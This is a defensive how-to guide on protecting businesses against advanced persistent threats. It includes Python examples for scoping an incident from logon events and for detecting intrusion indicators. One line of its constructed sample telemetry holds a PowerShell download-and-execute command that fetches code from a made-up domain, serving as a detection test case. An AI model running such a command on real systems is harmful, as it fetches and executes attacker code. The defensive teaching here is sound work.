How To Guide
How to Protect Against Advanced Persistent Threats (APTs)
APTs are targeted, patient attacks by well-resourced adversaries.
Overview
Attackers may spend months inside your network, harvesting credentials and mapping systems, before they act on their objective or are detected.
Step 1: Prevention
Harden defences.
1. Defence in Depth
- Firewall with IDS/IPS at the network edge
- Network segmentation: keep user, server and management networks apart
- EDR on all endpoints, servers included
- MFA for every user, and PAM for administrative access
- Encryption at rest and in transit, with DLP at egress points
- Security awareness training
2. Reduce Attack Surface
- Disable unnecessary services
- Remove unused accounts
- Patch critical and high-severity vulnerabilities within 14 days of release (the Cyber Essentials requirement)
- Harden with CIS Benchmarks
- Restrict PowerShell: remove PowerShell v2, enforce Constrained Language Mode (via AppLocker or WDAC) and enable script block logging
- Disable Office macros: block macros in files downloaded from the internet via Group Policy
Step 2: Detection
Find attackers.
1. Monitoring
- SIEM for log correlation across endpoint, identity and network sources
- EDR for endpoint visibility
- Monitor DNS for queries to known-malicious and newly registered domains; DNS is also a common command-and-control channel
- Watch for lateral movement: unexpected RDP, SMB or WinRM connections between workstations, and admin logons from unusual hosts
- Threat intelligence feeds, matched against your own logs
2. Hunting
- Actively search for threats rather than waiting for alerts
- Hunt for unusual processes and parent-child relationships, such as Office applications spawning cmd.exe or powershell.exe
- Check scheduled tasks, services and other autostart locations for persistence
- Review PowerShell logs (script block logging, Event ID 4104) for encoded or download-and-execute commands
- Run threat-hunting exercises at least quarterly
Step 3: Response
Handle correctly.
1. APT Response
- Understand the full scope before blocking anything: removing one foothold early warns the adversary, who simply switches to another
- Engage professional IR services
- Map all compromised accounts and every host they touched
- Coordinate eradication so that every foothold is removed in a single window
- Reset ALL credentials, including service accounts and, if a domain controller is in scope, the krbtgt account (reset twice)
- Keep heightened monitoring in place for at least 90 days post-incident
Warning:
APTs maintain multiple persistence mechanisms. Full scope assessment before eradication is critical.
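The scoping step above ("understand full scope before blocking", "map all compromised accounts") can be made concrete with a small graph walk over logon telemetry. The following is an added example written for this guide, not a tool the guide describes: it assumes Windows 4624 events reduced to user, host and logon type, a hand-written host-role table, and constructed sample logons. Each known-compromised account taints every host it logged on to; every host then exposes every credential cached on it (interactive, batch, service and RDP logons, which leave material in LSASS), and the walk repeats until nothing new appears.

```python
"""Estimate the scope of an intrusion from logon telemetry before eradication.
Added example for this guide, not a tool the guide describes. The reduced 4624
event schema, the host roles and the sample logons are assumptions."""
from collections import defaultdict, deque

# Logon types whose credentials end up cached on the host (in LSASS, where an
# attacker with local admin can recover them): interactive (2), batch (4),
# service (5), RDP (10) and cached interactive (11). Network logons (3) leave no
# reusable credential, so they mark the host as reached but expose no new account.
CREDENTIAL_EXPOSING_LOGONS = {2, 4, 5, 10, 11}
DOMAIN_CONTROLLERS = {"DC01"}   # assumed host role, from the asset inventory


def build_graph(logons):
    """account -> hosts it logged on to; host -> accounts whose credentials it holds."""
    acct_to_hosts, host_exposes = defaultdict(set), defaultdict(set)
    for logon in logons:
        acct_to_hosts[logon["user"]].add(logon["host"])
        if logon["logon_type"] in CREDENTIAL_EXPOSING_LOGONS:
            host_exposes[logon["host"]].add(logon["user"])
    return acct_to_hosts, host_exposes


def scope_incident(logons, seed_accounts):
    """Breadth-first expansion from the known-compromised accounts: each one taints
    every host it logged on to, each tainted host exposes every credential cached
    on it, and so on until nothing new is found. Depth = hops from the seed."""
    acct_to_hosts, host_exposes = build_graph(logons)
    accounts, hosts = {}, {}
    queue = deque((a, 0) for a in seed_accounts)
    while queue:
        acct, depth = queue.popleft()
        if acct in accounts:
            continue
        accounts[acct] = depth
        for host in acct_to_hosts[acct]:
            hosts.setdefault(host, depth)
            for exposed in host_exposes[host]:
                if exposed not in accounts:
                    queue.append((exposed, depth + 1))
    return {
        "accounts_to_reset": accounts,
        "hosts_to_rebuild": hosts,
        # A tainted domain controller means the krbtgt hash must be assumed stolen
        # (Golden Ticket risk): reset krbtgt twice as part of the credential reset.
        "dc_in_scope": bool(hosts.keys() & DOMAIN_CONTROLLERS),
    }


LOGONS = [  # constructed sample, not real telemetry: 4624 events reduced to three fields
    {"user": "j.smith",   "host": "WS17",  "logon_type": 10},  # seed: phished user, RDP
    {"user": "p.jones",   "host": "WS17",  "logon_type": 3},   # network logon: nothing cached
    {"user": "da.admin",  "host": "WS17",  "logon_type": 2},   # domain admin at the console
    {"user": "da.admin",  "host": "DC01",  "logon_type": 10},
    {"user": "da.admin",  "host": "SQL01", "logon_type": 3},   # still taints SQL01
    {"user": "svc_sql",   "host": "SQL01", "logon_type": 5},   # service account cached there
    {"user": "backup.op", "host": "FS01",  "logon_type": 2},   # FS01 is never reached
]

if __name__ == "__main__":
    result = scope_incident(LOGONS, {"j.smith"})
    for key, value in result.items():
        print(f"{key}: {value}")
```

On the sample data, blocking only the phished user j.smith would leave da.admin and svc_sql in the adversary's hands and DC01 and SQL01 untouched; the walk shows why the reset and rebuild list must be built from the whole dwell window of logon events before anything is blocked.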
3. Supply Chain Security
- APT actors increasingly target smaller companies to reach their larger clients
- Assess the security posture of your critical vendors and suppliers
- Require security certifications from key suppliers (Cyber Essentials, ISO 27001)
- Monitor the software supply chain: verify the signatures and hashes of updates and patches before deployment
- Limit supplier access to only the systems and data they need
- Review supplier access quarterly and revoke it when no longer needed
- Include security requirements in all supplier contracts
4. Incident Indicators to Watch
- Unusual outbound connections to IP addresses, domains or cloud services a host has no business reason to contact (geography alone is a weak signal: attackers routinely use infrastructure in your own country)
- PowerShell or command-line activity on servers that normally have none
- New admin accounts appearing without change request documentation
- Changes to scheduled tasks, services or startup items on critical servers
- DNS queries to newly registered domains (less than 30 days old)
- A run of failed authentications followed by a successful one for the same account from a different source
- Large data archives (ZIP, RAR, 7z) being created in temporary directories, a sign of staging before exfiltration
- Service accounts being used interactively (logging in via RDP or console)
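The monitoring and hunting lists under Step 2 and the indicator list above describe what to look for; the following shows the detection logic itself, run over a handful of constructed events. It is an added example written for this guide, not tooling from the guide or its authors. The flattened event schema (Windows Security event IDs 4624, 4625, 4720, 4732, 4698, 7045, PowerShell 4104, Sysmon 11 and a "dns" record), the host baselines, the svc_ naming convention for service accounts and the domain-registration table standing in for a domain-age feed are all assumptions made for the example.

```python
"""Detection pass for the APT indicators in this guide, run over constructed
sample events. Added example, not tooling from the guide or its authors. The
flattened event schema, the host baselines, the svc_ naming convention and the
domain-registration table are all assumptions for the example."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed environment baselines (in practice: asset inventory, CMDB, change system).
CRITICAL_SERVERS = {"DC01", "FS01"}
NO_POWERSHELL_HOSTS = {"FS01"}          # servers where PowerShell is never expected
APPROVED_CHANGES = {"CHG-1042"}         # change tickets authorising admin account changes
# Stand-in for a domain-age feed (WHOIS creation dates); constructed for the example.
DOMAIN_REGISTERED = {"updates.example-vendor.com": "2021-05-01",
                     "cdn-sync-7731.xyz": "2024-03-02"}

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def service_account_interactive(events):
    """Service accounts (svc_*) logging on at the console (type 2) or via RDP (type 10)."""
    return [e for e in events if e["id"] == 4624 and e["user"].startswith("svc_")
            and e["logon_type"] in (2, 10)]

def failed_then_success(events, min_failures=3, window=timedelta(minutes=10)):
    """Burst of 4625 failures for an account, then a 4624 success from a different source."""
    hits, failures = [], defaultdict(list)
    for e in sorted(events, key=lambda e: parse_ts(e["ts"])):
        if e["id"] == 4625:
            failures[e["user"]].append(e)
        elif e["id"] == 4624:
            recent = [f for f in failures[e["user"]]
                      if parse_ts(e["ts"]) - parse_ts(f["ts"]) <= window]
            if len(recent) >= min_failures and any(f["src"] != e["src"] for f in recent):
                hits.append(e)
    return hits

def admin_without_change_ticket(events):
    """Account created (4720) and added to Administrators (4732) with no approved ticket."""
    created = {e["target"] for e in events if e["id"] == 4720}
    return [e for e in events if e["id"] == 4732 and e["group"] == "Administrators"
            and e["target"] in created and e.get("ticket") not in APPROVED_CHANGES]

def persistence_on_critical_servers(events):
    """Scheduled task created (4698) or service installed (7045) on a critical server."""
    return [e for e in events if e["id"] in (4698, 7045) and e["host"] in CRITICAL_SERVERS]

def powershell_where_unexpected(events):
    """Script block logging (4104) on hosts that have no business running PowerShell."""
    return [e for e in events if e["id"] == 4104 and e["host"] in NO_POWERSHELL_HOSTS]

def young_domain_queries(events, max_age_days=30):
    """DNS queries for domains registered fewer than max_age_days ago."""
    hits = []
    for e in events:
        if e["id"] != "dns":
            continue
        reg = DOMAIN_REGISTERED.get(e["domain"])
        if reg is None:
            continue  # age unknown: skipped here, but worth triaging in production
        age = parse_ts(e["ts"]) - datetime.strptime(reg, "%Y-%m-%d")
        if age.days < max_age_days:
            hits.append(e)
    return hits

def staged_archives(events, min_mb=200):
    """Large archives (Sysmon file-create, ID 11) appearing under a temp directory."""
    return [e for e in events if e["id"] == 11 and "\\temp\\" in e["path"].lower()
            and e["path"].lower().endswith((".zip", ".rar", ".7z")) and e["size_mb"] >= min_mb]

DETECTORS = [service_account_interactive, failed_then_success, admin_without_change_ticket,
             persistence_on_critical_servers, powershell_where_unexpected,
             young_domain_queries, staged_archives]

def run_all(events):
    """Run every detector; returns detector name -> list of matching events."""
    return {d.__name__: d(events) for d in DETECTORS}

EVENTS = [  # constructed sample telemetry, not real logs; one night's intrusion plus benign noise
    {"ts": "2024-03-12 02:14:05", "host": "WS17", "id": 4625, "user": "j.smith", "src": "10.0.5.23"},
    {"ts": "2024-03-12 02:14:09", "host": "WS17", "id": 4625, "user": "j.smith", "src": "10.0.5.23"},
    {"ts": "2024-03-12 02:14:12", "host": "WS17", "id": 4625, "user": "j.smith", "src": "10.0.5.23"},
    {"ts": "2024-03-12 02:15:40", "host": "WS17", "id": 4624, "user": "j.smith", "src": "10.0.9.77", "logon_type": 3},
    {"ts": "2024-03-12 02:20:00", "host": "FS01", "id": 4624, "user": "svc_backup", "src": "10.0.9.77", "logon_type": 10},
    {"ts": "2024-03-12 02:22:10", "host": "DC01", "id": 4720, "user": "svc_backup", "target": "helpdesk2"},
    {"ts": "2024-03-12 02:22:15", "host": "DC01", "id": 4732, "user": "svc_backup", "target": "helpdesk2", "group": "Administrators"},
    {"ts": "2024-03-12 09:05:00", "host": "DC01", "id": 4720, "user": "it.admin", "target": "new.starter", "ticket": "CHG-1042"},
    {"ts": "2024-03-12 09:05:04", "host": "DC01", "id": 4732, "user": "it.admin", "target": "new.starter", "group": "Administrators", "ticket": "CHG-1042"},
    {"ts": "2024-03-12 02:30:00", "host": "FS01", "id": 4104, "user": "svc_backup", "script": "IEX (New-Object Net.WebClient).DownloadString('http://cdn-sync-7731.xyz/a')"},
    {"ts": "2024-03-12 02:31:00", "host": "FS01", "id": 4698, "user": "svc_backup", "task": "\\Microsoft\\Windows\\Sync\\Updater"},
    {"ts": "2024-03-12 02:32:00", "host": "FS01", "id": "dns", "domain": "cdn-sync-7731.xyz"},
    {"ts": "2024-03-12 08:10:00", "host": "WS03", "id": "dns", "domain": "updates.example-vendor.com"},
    {"ts": "2024-03-12 02:40:00", "host": "FS01", "id": 11, "user": "svc_backup", "path": "C:\\Windows\\Temp\\~tmp4421.7z", "size_mb": 1850},
]

if __name__ == "__main__":
    for name, hits in run_all(EVENTS).items():
        for e in hits:
            print(f"[{name}] {e['ts']} {e['host']} {e.get('user', e.get('domain', ''))}")
```

Each detector fires once on the sample: the password spray against j.smith followed by a success from a second address, the backup service account arriving over RDP on a file server, an administrator created by that account with no change ticket, a download-and-execute PowerShell block and a new scheduled task on the same server, a query for a ten-day-old domain, and a 1.8 GB archive in Windows\Temp. The benign new.starter change (ticketed) and the long-registered vendor domain do not fire. The thresholds (three failures in ten minutes, 30-day domain age, 200 MB archives) are starting points to tune against your own baseline, and the baselines themselves are what turn these from generic rules into ones that fit your estate.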
5. Building Resilience
- Assume you will be breached and design systems to limit the damage when it happens
- Network segmentation limits lateral movement from one compromised system
- Offline, regularly tested backups ensure recovery even if all network-connected systems are encrypted
- Incident response retainer: pre-arrange with a professional IR firm before you need them
- Cyber insurance: ensure your policy covers APT-style targeted attacks specifically
- Regularly update your threat model based on threats to your industry sector
- Participate in industry threat intelligence sharing groups (CiSP in the UK)
- Accept that security is an ongoing investment, not a one-time project
Pro Tip:
The UK's Cyber Security Information Sharing Partnership (CiSP), run by the NCSC, is a free, government-backed platform where businesses share threat intelligence. Joining gives you early warning of threats targeting your sector.
Need Professional Help?
Our engineers provide expert assistance with setup, troubleshooting, and ongoing support for businesses and individuals across Cornwall.